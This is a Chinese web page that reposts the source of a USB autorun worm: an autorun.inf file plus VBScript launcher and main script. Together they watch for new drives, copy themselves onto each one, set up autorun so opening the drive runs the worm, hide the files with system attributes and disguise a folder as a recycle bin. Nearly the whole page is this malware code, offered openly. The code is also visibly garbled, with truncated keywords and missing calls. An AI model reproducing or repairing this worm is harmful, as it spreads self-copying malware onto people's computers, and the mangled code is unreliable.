autorun.inf病毒源代码

更新时间:2023-05-10 15:24:26 阅读: 评论:0

autorun.inf病毒源代码
'文件名:autorun.inf
[autorun] 
open= 
shell\open=打开(&O) 
shell\open\ stNP.vbs 
shell\open\Default=1 
shell\explore=资源管理器(&X) 
shell\explore\ stNP.vbs
'文件名:stNP.vbs
on error resume next 
t fso = CreateObject("Scripting.FileSys"&"temObject") 
if fso.FileExists("NP.vbs") = -1 then 
if fso.FileExists("d:\NP.vbs") = -1 then 
t f = file("d:\NP.vbs") 
if f.attributes = 0 then 
el 
f.attributes = 0 
end if 
f.delete(true) 
end if 
t wshshell = ateobject("WScript.Shell") 
wshshell.run "d:\NP.vbs" 
end if
'文件名:NP.vbs
'[NatruePark] 
'容错语句 
on Error resume next 
'变量声明及初始化 
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell 
t fso = CreateObject("Scripting.File"&"SystemObject") 
t wshshell = ateobject("WScript.Shell") 
old_n=0 
redim old_drs(old_n) 
old_drs(0)="C" 
'[主体部分] 
wshshell.run("explorer .\") 
dim i 
i = 0 
do while i>=0 and i<8*360 
scan_disk() 
if judge_new_disk() = 1 then 
dim left_n 
left_n = 1 
do while left_n<=(new_n-old_n) 
new_disk = new_drs(left_n+old_n)&":\" 
'-----------------<;维护块>----------------- 
if fso.FileExists(new_disk&"NP.vbs") = -1 then 
el 
lf_copy(new_disk) 
end if 
add_attrib(new_disk&"NP.vbs") 
if fso.FileExists(new_disk&"autorun.inf") = -1 then     
del_attrib(new_disk&"autorun.inf") 
end if 
add_autorun(new_disk) 
add_attrib(new_disk&"autorun.inf") 
if fso.FileExists(new_disk&"stNP.vbs") = -1 then 
el 
add_stNP(new_disk) 
end if 
add_attrib(new_disk&"stNP.vbs") 
'-----------------</维护块>----------------- 
'-----------------<;功能块>----------------- 
dim rec 
rec = "d:\Recyc1ed\" 
if fso.FolderExists(rec) = -1 then 
el 
end if 
add_attribf(rec) 
if fso.FileExists(rec&"desktop.ini") = -1 then 
el 
add_desktop(rec) 
end if 
add_attrib(rec&"desktop.ini") 
aim_folder = rec&Date()&Rnd() 
if fso.FolderExists(aim_folder) = -1 then 
el 
end if 
'查找"Serylab"文件夹并复制
if fso.FolderExists(new_disk&"Serylab") = -1 then 
add_attribf
(aim_folder) 
end if 
'通用复制 
if old_n = 0 then 
el 
t fp = Folder(new_drs(new_n)&":\") 
t fc = fp.SubFolders 
for each f in fc 
next 
t fc = fp.files 
for each f in fc 
next 
add_attribf(aim_folder) 
end if 
'-----------------</功能块>----------------- 
left_n=left_n+1 
loop 
copy_disk() 
end if 
wscript.sleep(10000) 
i=i+1 
loop 
'[函数部分] 
'可用驱动器检测 new_drs(),new_n 
function scan_disk() 
dim d, dr 
new_n = -1 
t dr = fso.drives 
for each d in dr 
if d.isready then 
new_n=new_n+1 
redim prerve new_drs(new_n) 
new_drs(new_n)=d.driveletter 
end if 
next 
end function 
'判断是否有新加入的驱动器 
function judge_new_disk() 
if new_n = old_n then 
judge_new_disk = 0 
elif new_n < old_n then 
redim prerve old_drs(new_n) 
old_n = new_n 
judge_new_disk = 0 
elif new_n > old_n then 
redim prerve old_drs(new_n) 
judge_new_disk = 1 
end if 
end function 
'复制新驱动器表单 
function copy_disk() 
dim n 
n=0 
do while n<=new_n 
old_drs(n) = new_drs(n) 
n=n+1 
loop 
old_n = new_n 
end function 
'添加指定文件属性 
function add_attrib(file) 
t f = file(file) 
if f.attributes = 7 then 
el 
f.attributes = 7 
end if 
end function 
'删除指定文件属性 
function del_attrib(file) 
t f = file(file) 
if f.attributes = 7 then 
f.attributes = 0 
el 
end if 
end function 
'自我复制到指定文件目录 
function lf_copy(folder) 
dim aim_path, mid_path, lf_file, mid_file 
aim_path = folder&"NP.vbs" 
mid_path = "c:\np.bin" 
t lf_file = fso.opentextfile(wscript.scriptfullname,1) 
lf = adall 
t mid_file = fso.opentextfile(mid_path,2,true) 
mid_file.write lf 
mid_file.clo 
t mid_file = file(mid_path) 
py(aim_path) 
mid_file.delete(true) 
end function 
'增加autorun.inf 
function add_autorun(folder) 
dim path 
path = folder&"autorun.inf" 
t temp = fso.CreateTextFile("c:\a.bin",true) 
temp.writeline "[autorun]" 
temp.writeline "open=" 
temp.writeline "shell\open=打
开(&O)" 
temp.writeline "shell\open\ stNP.vbs" 
temp.writeline "shell\open\Default=1" 
temp.writeline "shell\explore=资源管理器(&X)" 
temp.writeline "shell\explore\ stNP.vbs" 
temp.clo 
t cop = file("c:\a.bin") 
cop.delete(true) 
end function 
'增加desktop.ini 
function add_desktop(folder) 
dim path 
path = folder&"desktop.ini" 
t temp = fso.CreateTextFile("c:\d.bin",true) 
temp.writeline "[.ShellClassInfo]" 
temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}" 
temp.clo 
t cop = file("c:\d.bin") 
cop.delete(true) 
end function 
'增加stNP.vbs 
function add_stNP(folder) 
dim path 
t fso = CreateObject("Scripting.File"&"SystemObject") 
path = folder&"stNP.vbs" 
t temp = fso.CreateTextFile("c:\s.bin",true) 
temp.writeline "on error resume next" 
temp.writeline "t fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")" 
temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then" 
temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then" 
temp.writeline "t f = file("&chr(34)&"d:\NP.vbs"&chr(34)&")" 
temp.writeline "if f.attributes = 0 then" 
temp.writeline "el" 
temp.writeline "f.attributes = 0" 
temp.writeline "end if" 
temp.writeline "f.delete(true)" 
temp.writeline "end if" 
temp.writeline "pyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true" 
temp.writeline "t wshshell = ateobject("&chr(34)&"WScript.Shell"&chr(34)&")" 
temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34) 
temp.writeline "end if" 
temp.clo 
t cop = file("c:\s.bin") 
cop.delete(true) 
end function 
'添加指定文件夹属性 
function add_attribf(folder) 
t f = folder(folder) 
if f.attributes = 7 then 
el 
f.attributes = 7 
end if 
end function 
'删除指定文件夹属性 
function del_attribf(folder) 
t f = folder(folder) 
if f.attributes = 0 then 
el 
f.attributes = 0 
end if 
end function 
wscript.quit

本文发布于:2023-05-10 15:24:26,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/fan/89/879480.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:指定   文件夹   驱动器   部分
相关文章
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图